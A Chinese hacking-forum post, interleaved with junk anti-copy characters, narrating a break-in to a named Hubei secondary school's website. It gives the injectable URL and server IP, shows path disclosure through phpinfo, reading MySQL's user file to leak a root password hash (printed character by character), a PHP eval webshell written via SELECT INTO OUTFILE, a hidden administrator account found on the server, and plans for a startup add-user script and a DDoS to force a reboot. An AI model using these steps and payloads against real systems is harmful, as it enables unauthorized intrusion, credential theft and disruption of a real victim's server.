友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
3 N. V0 L( f8 U, h' G发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！

' O# J  Y  j7 ?8 [! S
2 c. N9 \: y) q9 o
" C7 ?/ K% y5 Q- k常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

8 H  X2 ?# y+ l! ^* }那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

, e% J- w5 Y0 Z试着爆绝对路径：
. K0 S1 J7 U  r) F' V7 ?1./phpMyAdmin/index.php?lang[]=1  
3 s7 T+ q% v# Y" f+ W  V2./phpMyAdmin/phpinfo.php  
: |& u4 q3 f+ s$ W% V7 s. \3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
2 y3 n- M0 l6 x7./phpmyadmin/libraries/mcrypt.lib.php   
. c6 o1 A/ V' s4 M( k8./phpmyadmin/libraries/export/xls.php  
; _. H: o" R1 G$ `8 o, M# @
均不行...........................
4 G, v/ _% F4 a7 b# j+ _" L' a
* F$ A$ i0 A# T: q御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
8 g& A! ^* g' A: e) z
权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

& q$ D% K  r9 G8 R6 a1 C8 P默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
% A$ S6 M9 M6 z( Y. s2 R& S5 [
6 |9 b' C6 N% f! H, b2 N' B敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
3 H$ {& o  k- k9 i
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
2 `# j1 _' n; G) c) T
4 e* d$ c1 Q; G9 i  O3 V' {http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

; P0 }& R' p+ A' I- H4 B  B成功读到root密码：
* f" S- @) d4 k- H9 L7 N
* _8 c& P+ Z! H" j, T  {17---- r(0072)
18---- o(006f)
19---- o(006f)
: U6 A& q7 B5 M3 |. b* Q! }+ u20---- t(0074)
21---- *(002a)
9 |8 [8 b( i* Y* o  I22---- 8(0038)
23---- 2(0032)
24---- E(0045)
25---- 1(0031)
26---- C(0043)
: I7 t( j* |: ]/ @3 t4 D/ v9 N) w27---- 5(0035)
28---- 8(0038)
; B' c! W$ {- {! d29---- 2(0032)
3 [0 F" K7 _3 B' N30---- 8(0038)
3 H. M2 j2 L7 Z$ a4 ~31---- A(0041)
32---- 9(0039)
+ Z0 U) F0 n" d2 \33---- B(0042)
34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
+ d3 @) i4 S- W" B! c# Y1 c38---- 4(0034)
39---- 9(0039)
; M$ s, M8 M4 \6 O: O40---- 1(0031)
' D+ |6 t  ^; i- y4 R41---- 1(0031)
4 l  u7 E1 U  c4 ]- J$ x4 j" {42---- 5(0035)
& F* ]' o9 n/ t43---- 3(0033)
5 c: y6 }0 H1 R0 K7 @44---- 5(0035)
45---- 9(0039)
46---- 8(0038)
! Q- `! r: ]& L7 A: G47---- F(0046)
48---- F(0046)
49---- 4(0034)
50---- F(0046)
51---- 0(0030)
52---- 3(0033)
, ?7 @; ^! R  n3 ~53---- 2(0032)
8 o) L- n# l  k& {" e8 j: B# s: v54---- A(0041)
55---- 4(0034)
1 \% o0 V3 @2 u56---- A(0041)
. L0 f" u4 o5 ]& x57---- B(0042)
# c) I8 g5 y' w8 h& ~58---- *(0044)
0 R! ^9 A+ A) B. G, l7 L. m59---- *(0035)
* W8 M1 e# P! a' _+ T. I60---- *(0041)
61---- *0032)

) p& N% j8 Y, U/ }解密后成功登陆phpmyamin
0 q: ?0 I  j7 c/ o9 F                          

                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

( V6 q9 r7 v: {, \* v0 K( T' [. R成功执行，拿下shell，菜刀连接：
. v6 V2 h" O' W
! D* `/ e( N& L服务器不支持asp,aspx,php提权无果...................
, W0 x& a3 [7 Q) X1 ?2 U
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
admin
: o5 |( K# x  W- G8 wAdministrator
slipper$
5 x' K. e! ]" g% \$ Xsqluser
命令成功完成。

$ r( Q7 E7 K/ x( q3 I4 }- W; L% T服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

( U  U1 b! o0 I  rddos服务器重启，不然就只能坐等服务器重启了...............................
/ a7 i" x  x9 w. S# n/ g% _8 N& j8 E
      

& [% F% y  _- c9 _

angel